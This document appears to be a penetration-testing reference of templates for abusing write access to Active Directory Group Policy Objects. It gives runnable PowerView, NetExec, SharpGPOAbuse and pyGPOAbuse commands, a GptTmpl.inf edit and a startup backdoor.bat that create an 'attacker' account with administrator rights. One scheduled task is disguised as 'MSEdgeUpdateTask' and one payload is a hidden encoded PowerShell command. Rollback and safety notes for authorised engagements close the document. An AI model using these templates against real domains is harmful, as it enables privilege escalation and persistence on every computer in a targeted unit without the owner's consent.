GPO Abuse Templates
When you have Write permissions on a GPO linked to a target OU (computer or user), you can push arbitrary actions to every member of that OU.
Preconditions
- Domain user with
GenericWrite/GenericAll/WriteDaclon a GPO object OR - Permissions on an organizational unit that allow adding a new GPO
- Knowledge of the GPO's GUID and the target OU
Identify usable GPOs
# PowerView
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
Where-Object { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" } |
Where-Object { $_.SecurityIdentifier -eq $MyUserSID }# NetExec
nxc ldap dc -u "$USER" -p "$PASS" --gpo-rights
# BloodHound
# See references/bloodhound_queries.md "GPO abuse" sectionTemplate 1: SharpGPOAbuse — immediate scheduled task (SYSTEM)
Adds a one-time "Immediate Task" that executes on every computer in the linked OU at next policy refresh (~90 min default, force with gpupdate /force).
SharpGPOAbuse.exe --AddComputerTask `
--TaskName "MSEdgeUpdateTask" `
--Author "NT AUTHORITY\SYSTEM" `
--Command "cmd.exe" `
--Arguments "/c net user attacker P@ssw0rd1! /add /domain && net localgroup Administrators attacker /add" `
--GPOName "WorkstationHardeningPolicy"Template 2: pyGPOAbuse (Linux-side)
python3 pyGPOAbuse.py corp.local/user:pass -gpo-id "{31B2F340-016D-11D2-945F-00C04FB984F9}" \
-f cmd -c "powershell -nop -w hidden -enc <b64>"Template 3: Add user to local administrators (user-side GPO)
For a user-linked GPO, edit GptTmpl.inf to add a domain user to Administrators on every host the user logs into:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Members = *S-1-5-21-<domain>-<rid of attacker>,*S-1-5-32-544__Memberof =Drop as \\corp.local\SYSVOL\corp.local\Policies\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf, then increment gPCMachineExtensionNames and GPO version counter.
Template 4: Startup script injection
Location: \\corp.local\SYSVOL\corp.local\Policies\{GUID}\Machine\Scripts\Startup\ + matching scripts.ini:
[Startup]
0CmdLine=backdoor.bat
0Parameters=Contents of backdoor.bat:
@echo off
net user attacker P@ssw0rd1! /add
net localgroup Administrators attacker /addTemplate 5: MSI install via software installation policy
For large-scope push of an MSI on reboot — heavy artefact, use sparingly.
Rollback (mandatory)
Every GPO edit must be reverted before engagement end:
SharpGPOAbuse.exe --RemoveComputerTask --TaskName "MSEdgeUpdateTask" \
--GPOName "WorkstationHardeningPolicy"Then confirm via gpresult /h post_rollback.html on at least one affected host.
Safety
- Changes propagate to EVERY member of the linked OU. Confirm OU membership before pushing.
gpupdate /forceis fast; the scheduled-task variant fires within seconds of refresh. Plan takedown BEFORE pushing.- Some customer GPO changes require change-management approval even from internal admins — ask first.
- Prefer user-scope over computer-scope where feasible — smaller blast radius.